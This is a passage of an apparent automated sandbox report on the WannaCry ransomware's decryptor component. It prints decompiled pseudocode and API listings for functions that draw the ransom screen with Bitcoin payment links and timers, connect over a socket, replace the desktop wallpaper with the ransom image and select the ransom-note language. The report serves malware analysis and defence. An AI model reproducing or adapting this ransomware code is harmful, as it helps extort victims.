				E00404260(_t348 + 0x290,  *(_t348 + 0x824) ^ 0x00ffffff);
				E00404260(_t348 + 0x2f8,  *(_t348 + 0x824) ^ 0x00ffffff);
				_t260 = _t348 + 0x360;
				E00404260(_t260,  *(_t348 + 0x824) ^ 0x00ffffff);
				_push(_t260);
				 *((intOrPtr*)(_t356 + 0x18)) = _t356;
				L00412CAA();
				_t262 = _t348 + 0x228;
				E00404210(_t262, "https://en.wikipedia.org/wiki/Bitcoin");
				_push(_t262);
				 *((intOrPtr*)(_t356 + 0x18)) = _t356;
				L00412CAA();
				E00404210(_t348 + 0x290, "https://www.google.com/search?q=how+to+buy+bitcoin");
				L00412DA6();
				_push(_t348 + 0x58c);
				_push("mailto:%s");
				_push(_t356 + 0x10);
				 *(_t356 + 0xf8) = 0;
				L00412E00();
				_t357 = _t356 + 8;
				 *((intOrPtr*)(_t357 + 0x18)) = _t357;
				L00412F56();
				E00404210(_t348 + 0x2f8, _t357 + 0x14);
				E00404270(_t348 + 0x888);
				_push( *((intOrPtr*)(_t348 + 0x508)));
				_push("http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s");
				_push(_t357 + 0x10); // executed
				L00412E00(); // executed
				_t358 = _t357 + 8;
				 *((intOrPtr*)(_t358 + 0x18)) = _t358;
				L00412F56();
				E00404210(_t348 + 0x360, _t358 + 0x14);
				SendMessageA( *(_t348 + 0x140), 0x406, 0, 0x64);
				SendMessageA( *(_t348 + 0x1c4), 0x406, 0, 0x64);
				_push(0xffffffff);
				_push(2);
				L00412F50();
				_push(0xffffffff);
				_push(2);
				 *( *(_t348 + 0x164)) = 0xe0;
				( *(_t348 + 0x164))[1] = 0xe000;
				L00412F50();
				 *( *(_t348 + 0x1e8)) = 0xe0;
				( *(_t348 + 0x1e8))[1] = 0xe000;
				_t342 = _t348 + 0x3c8;
				E00405820(_t348 + 0x3c8, 1);
				E00405800(_t348 + 0x3c8, 0xb);
				E00405200(_t348 + 0x3c8, 0);
				_push( *(_t348 + 0x824));
				E00405920(_t348 + 0x3c8,  *(_t348 + 0x824), 0xffffff);
				E00405860(_t342, 0xb);
				E004058C0(_t342, 1);
				E00405990(_t342, 1, 0x20);
				E00405180(_t342, "00;00;00;00");
				_t343 = _t348 + 0x444;
				E00405820(_t348 + 0x444, 1);
				E00405800(_t348 + 0x444, 0xb);
				E00405200(_t348 + 0x444, 0);
				_push( *(_t348 + 0x824));
				E00405920(_t348 + 0x444,  *(_t348 + 0x824), 0xffffff);
				E00405860(_t343, 0xb);
				E004058C0(_t343, 1);
				E00405990(_t343, 1, 0x20);
				E00405180(_t343, "00;00;00;00");
				GetTimeZoneInformation(_t358 + 0x38); // executed
				_push(_t358 + 0x28);
				E00401E60(_t375, ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2) * 4 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2) * 4) * 4 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2) * 4 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2) * 4) * 4) * 8 << 7) +  *((intOrPtr*)(_t348 + 0x578)));
				_t359 = _t358 + 8;
				SystemTimeToTzSpecificLocalTime(_t359 + 0x3c, _t359 + 0x28, _t359 + 0x18); // executed
				_push( *(_t359 + 0x24) & 0x0000ffff);
				_push( *(_t359 + 0x22) & 0x0000ffff);
				_push( *(_t359 + 0x20) & 0x0000ffff);
				_push( *(_t359 + 0x1c) & 0x0000ffff);
				_push( *(_t359 + 0x26) & 0x0000ffff);
				_push( *(_t359 + 0x26) & 0x0000ffff);
				_push("%d/%d/%d %02d:%02d:%02d");
				_push(_t348 + 0x500);
				L00412E00();
				_push(_t359 + 0x48);
				E00401E60(_t375, ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2) * 4 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2) * 4) * 4 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2) * 4 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2) * 4) * 4) * 8 << 7) +  *((intOrPtr*)(_t348 + 0x578)));
				_t360 = _t359 + 0x28;
				SystemTimeToTzSpecificLocalTime(_t360 + 0x38, _t360 + 0x28, _t360 + 0x18); // executed
				_push( *(_t360 + 0x24) & 0x0000ffff);
				_push( *(_t360 + 0x22) & 0x0000ffff);
				_push( *(_t360 + 0x20) & 0x0000ffff);
				_push( *(_t360 + 0x20) & 0x0000ffff);
				_push( *(_t360 + 0x26) & 0x0000ffff);
				_push( *(_t360 + 0x26) & 0x0000ffff);
				_t214 = _t348 + 0x504;
				_push("%d/%d/%d %02d:%02d:%02d");
				_push(_t214);
				L00412E00();
				_t361 = _t360 + 0x20;
				_push(0); // executed
				L00412E06(); // executed
				 *((intOrPtr*)(_t361 + 0xec)) = 0xffffffff;
				L00412CC2();
				 *[fs:0x0] =  *((intOrPtr*)(_t361 + 0xe4));
				return _t214;
			}





































                                                      0x00406f80
                                                      0x00406f86
                                                      0x00406f88
                                                      0x00406f8d
                                                      0x00406f8e
                                                      0x00406f95
                                                      0x00406f9f
                                                      0x00406fa1
                                                      0x00406fa3
                                                      0x00406fb5
                                                      0x00406fbc
                                                      0x00406fc8
                                                      0x00406fcf
                                                      0x00406fdb
                                                      0x00406fe2
                                                      0x00406fee
                                                      0x00406ff5
                                                      0x00406ffe
                                                      0x00407005
                                                      0x00407011
                                                      0x00407018
                                                      0x00407024
                                                      0x0040702b
                                                      0x00407037
                                                      0x0040703e
                                                      0x0040704a
                                                      0x00407051
                                                      0x0040705d
                                                      0x00407064
                                                      0x00407091
                                                      0x00407099
                                                      0x0040709c
                                                      0x004070c3
                                                      0x004070cb
                                                      0x004070ce
                                                      0x004070f5
                                                      0x004070fb
                                                      0x00407101
                                                      0x00407104
                                                      0x00407109
                                                      0x00407110
                                                      0x00407117
                                                      0x00407119
                                                      0x00407119
                                                      0x0040712b
                                                      0x0040712d
                                                      0x00407134
                                                      0x0040713b
                                                      0x00407141
                                                      0x0040713d
                                                      0x0040713d
                                                      0x0040713d
                                                      0x0040714d
                                                      0x0040714f
                                                      0x00407156
                                                      0x0040715d
                                                      0x00407163
                                                      0x0040715f
                                                      0x0040715f
                                                      0x0040715f
                                                      0x0040716f
                                                      0x00407171
                                                      0x00407178
                                                      0x0040717f
                                                      0x00407185
                                                      0x00407181
                                                      0x00407181
                                                      0x00407181
                                                      0x00407191
                                                      0x00407193
                                                      0x0040719a
                                                      0x004071a1
                                                      0x004071a7
                                                      0x004071a3
                                                      0x004071a3
                                                      0x004071a3
                                                      0x004071b3
                                                      0x004071b5
                                                      0x004071bc
                                                      0x004071c3
                                                      0x004071c9
                                                      0x004071c5
                                                      0x004071c5
                                                      0x004071c5
                                                      0x004071d5
                                                      0x004071d7
                                                      0x004071de
                                                      0x004071e5
                                                      0x004071e7
                                                      0x004071e7
                                                      0x004071f3
                                                      0x004071f5
                                                      0x004071fc
                                                      0x00407203
                                                      0x00407209
                                                      0x00407205
                                                      0x00407205
                                                      0x00407205
                                                      0x00407215
                                                      0x00407217
                                                      0x0040721e
                                                      0x00407225
                                                      0x0040722b
                                                      0x00407227
                                                      0x00407227
                                                      0x00407227
                                                      0x00407237
                                                      0x00407239
                                                      0x00407240
                                                      0x00407247
                                                      0x0040724d
                                                      0x00407249
                                                      0x00407249
                                                      0x00407249
                                                      0x00407259
                                                      0x0040725b
                                                      0x00407262
                                                      0x00407269
                                                      0x0040726b
                                                      0x0040726b
                                                      0x00407277
                                                      0x00407285
                                                      0x00407288
                                                      0x0040729f
                                                      0x004072b7
                                                      0x004072d0
                                                      0x004072db
                                                      0x004072e8
                                                      0x004072ed
                                                      0x004072f0
                                                      0x004072f9
                                                      0x004072fe
                                                      0x00407304
                                                      0x00407309
                                                      0x0040730c
                                                      0x00407315
                                                      0x00407320
                                                      0x00407329
                                                      0x00407338
                                                      0x00407339
                                                      0x0040733e
                                                      0x0040733f
                                                      0x0040734a
                                                      0x0040734f
                                                      0x00407358
                                                      0x0040735d
                                                      0x00407364
                                                      0x00407372
                                                      0x0040737e
                                                      0x0040737f
                                                      0x00407384
                                                      0x00407385
                                                      0x0040738a
                                                      0x00407393
                                                      0x00407398
                                                      0x004073a3
                                                      0x004073b8
                                                      0x004073ca
                                                      0x004073cc
                                                      0x004073ce
                                                      0x004073d6
                                                      0x004073e6
                                                      0x004073e8
                                                      0x004073ea
                                                      0x004073fc
                                                      0x004073ff
                                                      0x0040740c
                                                      0x00407418
                                                      0x0040741b
                                                      0x00407423
                                                      0x0040742c
                                                      0x00407435
                                                      0x00407442
                                                      0x00407449
                                                      0x00407452
                                                      0x0040745b
                                                      0x00407466
                                                      0x00407472
                                                      0x00407477
                                                      0x00407481
                                                      0x0040748a
                                                      0x00407493
                                                      0x004074a0
                                                      0x004074a7
                                                      0x004074b0
                                                      0x004074b9
                                                      0x004074c4
                                                      0x004074d0
                                                      0x004074da
                                                      0x004074f3
                                                      0x00407503
                                                      0x0040750e
                                                      0x00407520
                                                      0x00407539
                                                      0x00407544
                                                      0x00407549
                                                      0x00407559
                                                      0x00407560
                                                      0x00407561
                                                      0x00407568
                                                      0x0040756d
                                                      0x0040756e
                                                      0x0040757d
                                                      0x00407596
                                                      0x0040759b
                                                      0x004075ad
                                                      0x004075c6
                                                      0x004075c7
                                                      0x004075d6
                                                      0x004075e6
                                                      0x004075ed
                                                      0x004075ee
                                                      0x004075ef
                                                      0x004075f5
                                                      0x004075fa
                                                      0x004075fb
                                                      0x00407600
                                                      0x00407605
                                                      0x00407607
                                                      0x00407610
                                                      0x0040761b
                                                      0x0040762a
                                                      0x00407638

                                                      APIs
                                                        • Part of subcall function 004076A0: time.MSVCRT ref: 004076DA
                                                      • CreateSolidBrush.GDI32(000000E0), ref: 00406FB3
                                                      • #1641.MFC42(00000000,?,767B20C0,?), ref: 00406FBC
                                                      • CreateSolidBrush.GDI32(00121284), ref: 00406FC6
                                                      • #1641.MFC42(00000000,?,767B20C0,?), ref: 00406FCF
                                                      • CreateSolidBrush.GDI32(0000E000), ref: 00406FD9
                                                      • #1641.MFC42(00000000,?,767B20C0,?), ref: 00406FE2
                                                      • CreateSolidBrush.GDI32(00E00000), ref: 00406FEC
                                                      • #1641.MFC42(00000000,?,767B20C0,?), ref: 00406FF5
                                                      • CreateSolidBrush.GDI32(00000000), ref: 00406FFC
                                                      • #1641.MFC42(00000000,?,767B20C0,?), ref: 00407005
                                                      • CreateSolidBrush.GDI32(003834D1), ref: 0040700F
                                                      • #1641.MFC42(00000000,?,767B20C0,?), ref: 00407018
                                                      • CreateSolidBrush.GDI32(00107C10), ref: 00407022
                                                      • #1641.MFC42(00000000,?,767B20C0,?), ref: 0040702B
                                                      • CreateSolidBrush.GDI32(00E8A200), ref: 00407035
                                                      • #1641.MFC42(00000000,?,767B20C0,?), ref: 0040703E
                                                      • CreateSolidBrush.GDI32(00D77800), ref: 00407048
                                                      • #1641.MFC42(00000000,?,767B20C0,?), ref: 00407051
                                                      • CreateSolidBrush.GDI32(00003CDA), ref: 0040705B
                                                      • #1641.MFC42(00000000,?,767B20C0,?), ref: 00407064
                                                      • CreateFontA.GDI32(00000018,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 00407097
                                                      • #1641.MFC42(00000000,?,767B20C0,?), ref: 0040709C
                                                      • CreateFontA.GDI32(00000012,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 004070C9
                                                      • #1641.MFC42(00000000,?,767B20C0,?), ref: 004070CE
                                                      • CreateFontA.GDI32(00000010,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 004070FB
                                                      • #1641.MFC42(00000000,?,767B20C0,?), ref: 00407104
                                                      • #3092.MFC42(000003ED,00000000,?,767B20C0,?), ref: 00407110
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040712B
                                                      • #3092.MFC42(000003FE,?,767B20C0,?), ref: 00407134
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040714D
                                                      • #3092.MFC42(000003FB,?,767B20C0,?), ref: 00407156
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040716F
                                                      • #3092.MFC42(000003FF,?,767B20C0,?), ref: 00407178
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 00407191
                                                      • #3092.MFC42(000003FC,?,767B20C0,?), ref: 0040719A
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 004071B3
                                                      • #3092.MFC42(00000400,?,767B20C0,?), ref: 004071BC
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 004071D5
                                                      • #3092.MFC42(000003FA,?,767B20C0,?), ref: 004071DE
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 004071F3
                                                      • #3092.MFC42(00000402,?,767B20C0,?), ref: 004071FC
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 00407215
                                                      • #3092.MFC42(000003EF,?,767B20C0,?), ref: 0040721E
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 00407237
                                                      • #3092.MFC42(000003EB,?,767B20C0,?), ref: 00407240
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 00407259
                                                      • #3092.MFC42(000003EC,?,767B20C0,?), ref: 00407262
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 00407277
                                                      • #860.MFC42(?,?,767B20C0,?), ref: 00407288
                                                      • #537.MFC42(https://en.wikipedia.org/wiki/Bitcoin,?,?,?,767B20C0,?), ref: 004072F9
                                                      • #537.MFC42(https://www.google.com/search?q=how+to+buy+bitcoin,?,?,?,?,767B20C0,?), ref: 00407315
                                                      • #540.MFC42(?,?,?,?,767B20C0,?), ref: 00407329
                                                      • #2818.MFC42(?,mailto:%s,?,?,?,?,?,767B20C0,?), ref: 0040734A
                                                      • #535.MFC42(?), ref: 0040735D
                                                      • #2818.MFC42(?,http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s,00000000), ref: 00407385
                                                      • #535.MFC42(?), ref: 00407398
                                                        • Part of subcall function 00404210: #858.MFC42(?,?,00413788,000000FF), ref: 00404235
                                                        • Part of subcall function 00404210: #800.MFC42(?,?,00413788,000000FF), ref: 00404246
                                                      • SendMessageA.USER32(?,00000406,00000000,00000064), ref: 004073B8
                                                      • SendMessageA.USER32(?,00000406,00000000,00000064), ref: 004073CA
                                                      • #6140.MFC42(00000002,000000FF), ref: 004073D6
                                                      • #6140.MFC42(00000002,000000FF,00000002,000000FF), ref: 004073FF
                                                        • Part of subcall function 00405860: GetClientRect.USER32(?,?), ref: 0040587E
                                                        • Part of subcall function 00405860: #6197.MFC42(00000000,00000000,00000000,?,?,00000002), ref: 004058A5
                                                        • Part of subcall function 004058C0: GetClientRect.USER32(?,?), ref: 004058DE
                                                        • Part of subcall function 004058C0: #6197.MFC42(00000000,00000000,00000000,?,?,00000002), ref: 00405905
                                                        • Part of subcall function 00405180: _mbscmp.MSVCRT ref: 00405191
                                                        • Part of subcall function 00405180: #860.MFC42(?), ref: 004051A1
                                                        • Part of subcall function 00405180: RedrawWindow.USER32(?,00000000,00000000,00000121), ref: 004051DE
                                                        • Part of subcall function 00405180: InvalidateRect.USER32(?,00000000,00000001), ref: 004051F2
                                                      • GetTimeZoneInformation.KERNELBASE(?,0000000B,00000001,0000000B,00000001,00000002,000000FF,00000002,000000FF), ref: 004074DA
                                                        • Part of subcall function 00401E60: VariantTimeToSystemTime.OLEAUT32(?), ref: 00401E7B
                                                      • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?), ref: 00407520
                                                      • #2818.MFC42(?,%d/%d/%d %02d:%02d:%02d,?,?,?,?,?,?), ref: 0040756E
                                                      • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?), ref: 004075AD
                                                      • #2818.MFC42(?,%d/%d/%d %02d:%02d:%02d,?,?,?,?,?,?), ref: 004075FB
                                                      • #6334.MFC42(00000000), ref: 00407607
                                                      • #800.MFC42 ref: 0040761B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #1641CreateMessageSend$#3092$BrushSolid$Time$#2818$FontRectSystem$#535#537#6140#6197#800#860ClientLocalSpecific$#540#6334#858InformationInvalidateRedrawVariantWindowZone_mbscmptime
                                                      • String ID: %d/%d/%d %02d:%02d:%02d$00;00;00;00$Arial$http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s$https://en.wikipedia.org/wiki/Bitcoin$https://www.google.com/search?q=how+to+buy+bitcoin$mailto:%s
                                                      • API String ID: 28786460-3869059234
                                                      • Opcode ID: 200e83b7d3820b486b06c35be801168636e9bf215e2def9df31dd5cd78b3127c
                                                      • Instruction ID: 980e8df72422c457d288d06354c1d21c6ecb0c69e0d4732a7e3947204bb0ebed
                                                      • Opcode Fuzzy Hash: 200e83b7d3820b486b06c35be801168636e9bf215e2def9df31dd5cd78b3127c
                                                      • Instruction Fuzzy Hash: DB02D3B0344705ABD624EB61CC92FBF339AAFC4B04F00452DF2566B2D1DEB8B5058B99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040D6A0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120networkCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 342 40d6a0-40d6ed htons socket 343 40d6f3-40d711 bind 342->343 344 40d814-40d821 342->344 345 40d717-40d72c ioctlsocket 343->345 346 40d809-40d80b 343->346 345->346 347 40d732-40d789 connect select 345->347 346->344 348 40d80d-40d80e closesocket 346->348 347->346 349 40d78b-40d798 __WSAFDIsSet 347->349 348->344 350 40d79a-40d7aa __WSAFDIsSet 349->350 351 40d7ac-40d806 ioctlsocket setsockopt * 2 349->351 350->346 350->351
                                                      APIs
                                                      • htons.WS2_32 ref: 0040D6C7
                                                      • socket.WS2_32(00000002,00000001,00000006), ref: 0040D6E1
                                                      • bind.WS2_32(00000000,?,00000010), ref: 0040D709
                                                      • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 0040D728
                                                      • connect.WS2_32(00000000,?,00000010), ref: 0040D73A
                                                      • select.WS2_32(00000001,?,?,00000000,00000001), ref: 0040D781
                                                      • __WSAFDIsSet.WS2_32(00000000,?), ref: 0040D791
                                                      • __WSAFDIsSet.WS2_32(00000000,?), ref: 0040D7A3
                                                      • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 0040D7BB
                                                      • setsockopt.WS2_32(00000000), ref: 0040D7DD
                                                      • setsockopt.WS2_32(00000000,0000FFFF,00001005,?,00000004), ref: 0040D7F1
                                                      • closesocket.WS2_32(00000000), ref: 0040D80E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ioctlsocketsetsockopt$bindclosesocketconnecthtonsselectsocket
                                                      • String ID: `
                                                      • API String ID: 478405425-1850852036
                                                      • Opcode ID: 207a0d99be8aa74ddfaa5851ea6aa8d1a80ed73a610e947c43882b9ed202ce50
                                                      • Instruction ID: 6de462713d41b41c0891f3cf9d152f402d0f08cb5dc9382bbec9442f00cca922
                                                      • Opcode Fuzzy Hash: 207a0d99be8aa74ddfaa5851ea6aa8d1a80ed73a610e947c43882b9ed202ce50
                                                      • Instruction Fuzzy Hash: 83418372504341AED320DF55DC84EEFB7E8EFC8714F40892EF558D6290E7B495088BAA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00407E80 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 67fileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      C-Code - Quality: 62%
                                                      			E00407E80() {
				void _v518;
				short _v520;
				short _v540;
				void _v1038;
				char _v1040;
				long _v1060;
				void _v1558;
				short _v1560;
				long _v1580;
				int _t23;
				short _t39;
				void* _t42;
				void* _t54;
				void* _t55;

				_t39 =  *0x42179c; // 0x0
				_v1040 = _t39;
				memset( &_v1038, 0, 0x81 << 2);
				asm("stosw");
				_v1560 = _t39;
				memset( &_v1558, 0, 0x81 << 2);
				asm("stosw");
				_v520 = _t39;
				memset( &_v518, 0, 0x81 << 2);
				asm("stosw");
				__imp__SHGetFolderPathW(0, 0, 0, 0,  &_v1040, _t42); // executed
				_t23 = wcslen( &_v1060);
				_t54 =  &_v1560 + 0x28;
				if(_t23 != 0) {
					_push(L"@WanaDecryptor@.bmp");
					swprintf( &_v1580, L"%s\\%s",  &_v1060);
					_t55 = _t54 + 0x10;
					MultiByteToWideChar(0, 0, "b.wnry", 0xffffffff,  &_v540, 0x103);
					CopyFileW( &_v540, _t55, 0); // executed
					return SystemParametersInfoW(0x14, 0, _t55, 1);
				} else {
					return _t23;
				}
			}

















                                                      0x00407e86
                                                      0x00407e9c
                                                      0x00407ea4
                                                      0x00407ea6
                                                      0x00407eb3
                                                      0x00407eb8
                                                      0x00407eba
                                                      0x00407eca
                                                      0x00407ed2
                                                      0x00407ed4
                                                      0x00407ee6
                                                      0x00407ef4
                                                      0x00407efa
                                                      0x00407f00
                                                      0x00407f10
                                                      0x00407f20
                                                      0x00407f26
                                                      0x00407f41
                                                      0x00407f56
                                                      0x00407f73
                                                      0x00407f08
                                                      0x00407f08
                                                      0x00407f08

                                                      APIs
                                                      • SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,?), ref: 00407EE6
                                                      • wcslen.MSVCRT ref: 00407EF4
                                                      • swprintf.MSVCRT(?,%s\%s,?,@WanaDecryptor@.bmp), ref: 00407F20
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,b.wnry,000000FF,?,00000103), ref: 00407F41
                                                      • CopyFileW.KERNELBASE(?,?,00000000), ref: 00407F56
                                                      • SystemParametersInfoW.USER32(00000014,00000000,?,00000001), ref: 00407F67
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ByteCharCopyFileFolderInfoMultiParametersPathSystemWideswprintfwcslen
                                                      • String ID: %s\%s$@WanaDecryptor@.bmp$b.wnry
                                                      • API String ID: 13424474-2236924158
                                                      • Opcode ID: 620144e10b90fbdcf7842e1a5c35e3d362372363debefcfb0e035a8d8bd61632
                                                      • Instruction ID: 08a18ced9c3675786ff634b79335ab73d5ba80fa93599351ce40df3d96d25247
                                                      • Opcode Fuzzy Hash: 620144e10b90fbdcf7842e1a5c35e3d362372363debefcfb0e035a8d8bd61632
                                                      • Instruction Fuzzy Hash: 7E21F075204304BAE36087A4CC05FE773AAAFD4700F508938B359961E1EAB16154875B
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00406C20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 72windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 86%
                                                      			E00406C20(void* __ecx) {
				void _v51;
				void* _v52;
				signed int _t14;
				long _t17;
				void* _t26;
				char* _t30;
				unsigned int _t36;
				signed int _t37;
				void* _t55;

				_t26 = __ecx;
				_v52 = 0;
				memset( &_v51, 0, 0xc << 2);
				asm("stosb");
				_t14 = GetUserDefaultLangID();
				_t30 =  &_v52;
				if(GetLocaleInfoA(_t14 & 0x0000ffff, 0x1001, _t30, 0x32) == 0) {
					asm("repne scasb");
					_t36 =  !(_t30 | 0xffffffff);
					_t55 = "English" - _t36;
					_t37 = _t36 >> 2;
					memcpy(_t55 + _t37 + _t37, _t55, memcpy( &_v52, _t55, _t37 << 2) & 0x00000003);
				}
				_t17 = SendMessageA( *(_t26 + 0x80), 0x158, 0,  &_v52); // executed
				if(_t17 != 0xffffffff) {
					SendMessageA( *(_t26 + 0x80), 0x14d, 0,  &_v52); // executed
					return E00406AE0(_t26);
				} else {
					SendMessageA( *(_t26 + 0x80), 0x14e, 0, 0);
					return E00406AE0(_t26);
				}
			}












                                                      0x00406c25
                                                      0x00406c33
                                                      0x00406c38
                                                      0x00406c3a
                                                      0x00406c3b
                                                      0x00406c41
                                                      0x00406c5b
                                                      0x00406c65
                                                      0x00406c67
                                                      0x00406c71
                                                      0x00406c75
                                                      0x00406c7f
                                                      0x00406c7f
                                                      0x00406c9a
                                                      0x00406c9f
                                                      0x00406cd4
                                                      0x00406ce3
                                                      0x00406ca1
                                                      0x00406cb1
                                                      0x00406cc0
                                                      0x00406cc0

                                                      APIs
                                                      • GetUserDefaultLangID.KERNEL32 ref: 00406C3B
                                                      • GetLocaleInfoA.KERNEL32(00000000,00001001,00000000,00000032), ref: 00406C53
                                                      • SendMessageA.USER32(?,00000158,00000000,00000000), ref: 00406C9A
                                                      • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00406CB1
                                                      • SendMessageA.USER32(?,0000014D,00000000,00000000), ref: 00406CD4
                                                        • Part of subcall function 00406AE0: #540.MFC42(?,767B20C0), ref: 00406B03
                                                        • Part of subcall function 00406AE0: #3874.MFC42 ref: 00406B1B
                                                        • Part of subcall function 00406AE0: #537.MFC42(msg\), ref: 00406B29
                                                        • Part of subcall function 00406AE0: #924.MFC42(?,00000000,m_%s.wnry,msg\), ref: 00406B41
                                                        • Part of subcall function 00406AE0: sprintf.MSVCRT ref: 00406B59
                                                        • Part of subcall function 00406AE0: #800.MFC42(?,?,767B20C0), ref: 00406B62
                                                        • Part of subcall function 00406AE0: #800.MFC42 ref: 00406B73
                                                        • Part of subcall function 00406AE0: GetFileAttributesA.KERNELBASE(?), ref: 00406B7D
                                                        • Part of subcall function 00406AE0: #537.MFC42(msg\), ref: 00406B91
                                                        • Part of subcall function 00406AE0: #924.MFC42(?,00000000,m_%s.wnry,msg\), ref: 00406BA9
                                                        • Part of subcall function 00406AE0: sprintf.MSVCRT ref: 00406BBB
                                                        • Part of subcall function 00406AE0: #800.MFC42(?,?,?,?,?,767B20C0), ref: 00406BC4
                                                        • Part of subcall function 00406AE0: #800.MFC42 ref: 00406BD5
                                                        • Part of subcall function 00406AE0: #800.MFC42(?), ref: 00406BF5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
